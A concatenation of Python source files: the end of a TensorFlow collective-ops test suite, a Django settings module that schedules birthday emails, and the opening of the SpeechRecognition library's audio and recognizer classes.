instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
settings_20210906113725.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the daily task (the time below is currently set to 11:38)
schedule.every().day.at("11:38").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
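# A possible variant (not part of this project): mark the scheduler thread as a
# daemon so it cannot keep the process alive after Django shuts down, e.g.
#
#     t1 = threading.Thread(target=func, daemon=True)
#     t1.start()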
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
__init__.py
|
#!/usr/bin/env python3
"""Library for performing speech recognition, with support for several engines and APIs, online and offline."""
import io
import os
import subprocess
import wave
import aifc
import math
import audioop
import collections
import json
import base64
import threading
import platform
import stat
import hashlib
import hmac
import time
import uuid
import tempfile
__author__ = "Anthony Zhang (Uberi)"
__version__ = "3.6.0"
__license__ = "BSD"
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
class WaitTimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class Microphone(AudioSource):
"""
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
This will throw an ``AttributeError`` if you don't have PyAudio 0.2.9 or later installed.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
A device index is an integer between 0 and ``pyaudio.get_device_count() - 1`` (assume we have used ``import pyaudio`` beforehand) inclusive. It represents an audio device such as a microphone or speaker. See the `PyAudio documentation <http://people.csail.mit.edu/hubert/pyaudio/docs/>`__ for more details.
The microphone audio is recorded in chunks of ``chunk_size`` samples, at a rate of ``sample_rate`` samples per second (Hertz). If not specified, the value of ``sample_rate`` is determined automatically from the system's microphone settings.
Higher ``sample_rate`` values result in better audio quality, but also more bandwidth (and therefore, slower recognition). Additionally, some CPUs, such as those in older Raspberry Pi models, can't keep up if this value is too high.
    Higher ``chunk_size`` values help avoid triggering on rapidly changing ambient noise, but also make detection less sensitive. This value, generally, should be left at its default.
"""
def __init__(self, device_index=None, sample_rate=None, chunk_size=1024):
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
assert sample_rate is None or (isinstance(sample_rate, int) and sample_rate > 0), "Sample rate must be None or a positive integer"
assert isinstance(chunk_size, int) and chunk_size > 0, "Chunk size must be a positive integer"
# set up PyAudio
self.pyaudio_module = self.get_pyaudio()
audio = self.pyaudio_module.PyAudio()
try:
count = audio.get_device_count() # obtain device count
if device_index is not None: # ensure device index is in range
assert 0 <= device_index < count, "Device index out of range ({} devices available; device index should be between 0 and {} inclusive)".format(count, count - 1)
if sample_rate is None: # automatically set the sample rate to the hardware's default sample rate if not specified
device_info = audio.get_device_info_by_index(device_index) if device_index is not None else audio.get_default_input_device_info()
assert isinstance(device_info.get("defaultSampleRate"), (float, int)) and device_info["defaultSampleRate"] > 0, "Invalid device info returned from PyAudio: {}".format(device_info)
sample_rate = int(device_info["defaultSampleRate"])
except:
audio.terminate()
raise
self.device_index = device_index
self.format = self.pyaudio_module.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = self.pyaudio_module.get_sample_size(self.format) # size of each sample
self.SAMPLE_RATE = sample_rate # sampling rate in Hertz
self.CHUNK = chunk_size # number of frames stored in each buffer
self.audio = None
self.stream = None
@staticmethod
def get_pyaudio():
"""
Imports the pyaudio module and checks its version. Throws exceptions if pyaudio can't be found or a wrong version is installed
"""
try:
import pyaudio
except ImportError:
raise AttributeError("Could not find PyAudio; check installation")
from distutils.version import LooseVersion
if LooseVersion(pyaudio.__version__) < LooseVersion("0.2.9"):
raise AttributeError("PyAudio 0.2.9 or later is required (found version {})".format(pyaudio.__version__))
return pyaudio
@staticmethod
def list_microphone_names():
"""
Returns a list of the names of all available microphones. For microphones where the name can't be retrieved, the list entry contains ``None`` instead.
The index of each microphone's name is the same as its device index when creating a ``Microphone`` instance - indices in this list can be used as values of ``device_index``.
"""
audio = Microphone.get_pyaudio().PyAudio()
try:
result = []
for i in range(audio.get_device_count()):
device_info = audio.get_device_info_by_index(i)
result.append(device_info.get("name"))
finally:
audio.terminate()
return result
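    # Illustrative sketch (not part of the original library): choosing a microphone
    # by name instead of by raw index. The substring "USB" is only an example.
    #
    #     for index, name in enumerate(Microphone.list_microphone_names()):
    #         if name and "USB" in name:
    #             mic = Microphone(device_index=index)
    #             break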
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
self.audio = self.pyaudio_module.PyAudio()
try:
self.stream = Microphone.MicrophoneStream(
self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE, frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
)
)
except:
self.audio.terminate()
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.stream.close()
finally:
self.stream = None
self.audio.terminate()
class MicrophoneStream(object):
def __init__(self, pyaudio_stream):
self.pyaudio_stream = pyaudio_stream
def read(self, size):
return self.pyaudio_stream.read(size, exception_on_overflow=False)
def close(self):
try:
# sometimes, if the stream isn't stopped, closing the stream throws an exception
if not self.pyaudio_stream.is_stopped():
self.pyaudio_stream.stop_stream()
finally:
self.pyaudio_stream.close()
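# Illustrative usage sketch (not part of the library itself); assumes PyAudio is
# installed and a default input device exists. A ``Recognizer`` (defined below)
# is typically paired with a ``Microphone`` like this:
#
#     r = Recognizer()
#     with Microphone() as source:              # open the default microphone
#         r.adjust_for_ambient_noise(source)    # calibrate the energy threshold
#         audio = r.listen(source)              # record a single phrase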
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file ``filename_or_fileobject``. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
assert isinstance(filename_or_fileobject, (type(""), type(u""))) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except (wave.Error, EOFError):
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except (aifc.Error, EOFError):
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except (aifc.Error, EOFError):
raise ValueError("Audio file could not be read as PCM WAV, AIFF/AIFF-C, or Native FLAC; check if file is corrupted or in another format")
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size=-1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
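# Illustrative usage sketch (not part of the library); "speech.wav" is just an
# example path to a PCM WAV file:
#
#     r = Recognizer()
#     with AudioFile("speech.wav") as source:
#         audio = r.record(source)    # read the whole file into an AudioData instance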
class AudioData(object):
"""
Creates a new ``AudioData`` instance, which represents mono audio data.
The raw audio data is specified by ``frame_data``, which is a sequence of bytes representing audio samples. This is the frame data structure used by the PCM WAV format.
The width of each sample, in bytes, is specified by ``sample_width``. Each group of ``sample_width`` bytes represents a single audio sample.
The audio data is assumed to have a sample rate of ``sample_rate`` samples per second (Hertz).
Usually, instances of this class are obtained from ``recognizer_instance.record`` or ``recognizer_instance.listen``, or in the callback for ``recognizer_instance.listen_in_background``, rather than instantiating them directly.
"""
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
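    # Illustrative example (not in the original source): converting whatever was
    # recorded into 16 kHz, 16-bit mono raw PCM, the format the Sphinx recognizer
    # below requests internally:
    #
    #     pcm = audio.get_raw_data(convert_rate=16000, convert_width=2)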
def get_wav_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
def get_aiff_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of an AIFF-C file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `AIFF-C file <https://en.wikipedia.org/wiki/Audio_Interchange_File_Format>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
        # the AIFF format is big-endian, so we need to convert the little-endian raw data to big-endian
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4
raw_data = audioop.byteswap(raw_data, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
raw_data = raw_data[sample_width - 1::-1] + b"".join(raw_data[i + sample_width:i:-1] for i in range(sample_width - 1, len(raw_data), sample_width))
# generate the AIFF-C file contents
with io.BytesIO() as aiff_file:
aiff_writer = aifc.open(aiff_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
aiff_writer.setframerate(sample_rate)
aiff_writer.setsampwidth(sample_width)
aiff_writer.setnchannels(1)
aiff_writer.writeframes(raw_data)
aiff_data = aiff_file.getvalue()
finally: # make sure resources are cleaned up
aiff_writer.close()
return aiff_data
def get_flac_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a FLAC file containing the audio represented by the ``AudioData`` instance.
Note that 32-bit FLAC is not supported. If the audio data is 32-bit and ``convert_width`` is not specified, then the resulting FLAC will be a 24-bit FLAC.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `FLAC file <https://en.wikipedia.org/wiki/FLAC>`__.
"""
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 3), "Sample width to convert to must be between 1 and 3 inclusive"
if self.sample_width > 3 and convert_width is None: # resulting WAV data would be 32-bit, which is not convertable to FLAC using our encoder
convert_width = 3 # the largest supported sample width is 24-bit, so we'll limit the sample width to that
# run the FLAC converter with the WAV data to get the FLAC data
wav_data = self.get_wav_data(convert_rate, convert_width)
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting FLAC file in stdout, and make sure it's not mixed with any program output
"--best", # highest level of compression available
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
flac_data, stderr = process.communicate(wav_data)
return flac_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 400 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.6 # seconds of non-speaking audio before a phrase is considered complete
self.operation_timeout = None # seconds after an internal operation (e.g., an API request) starts before it times out, or ``None`` for no timeout
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
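    # Illustrative tuning sketch (not from the original source): in a consistently
    # noisy environment one might disable the dynamic threshold and pick a fixed
    # value instead; the numbers below are hypothetical and depend on the microphone.
    #
    #     r = Recognizer()
    #     r.dynamic_energy_threshold = False
    #     r.energy_threshold = 4000
    #     r.pause_threshold = 0.8    # wait a little longer before ending a phrase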
def record(self, source, duration=None, offset=None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration=1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using asymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
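    # The update above is an exponential moving average: damping is computed as
    # dynamic_energy_adjustment_damping ** seconds_per_buffer, so the threshold
    # drifts toward energy * dynamic_energy_ratio at a per-second rate that is
    # independent of the chunk size. For example, with 1024-sample buffers at
    # 16 kHz, seconds_per_buffer = 0.064 and damping = 0.15 ** 0.064 ≈ 0.886.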
def listen(self, source, timeout=None, phrase_time_limit=None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that this will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, there will be no wait timeout.
        The ``phrase_time_limit`` parameter is the maximum number of seconds that this will allow a phrase to continue before stopping and returning the part of the phrase processed before the time limit was reached. The resulting audio will be the phrase cut off at the time limit. If ``phrase_time_limit`` is ``None``, there will be no phrase time limit.
        This operation will always complete within ``timeout + phrase_time_limit`` seconds if both are numbers, either by returning the audio data, or by raising an exception.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio during a phrase, before the phrase should be considered complete
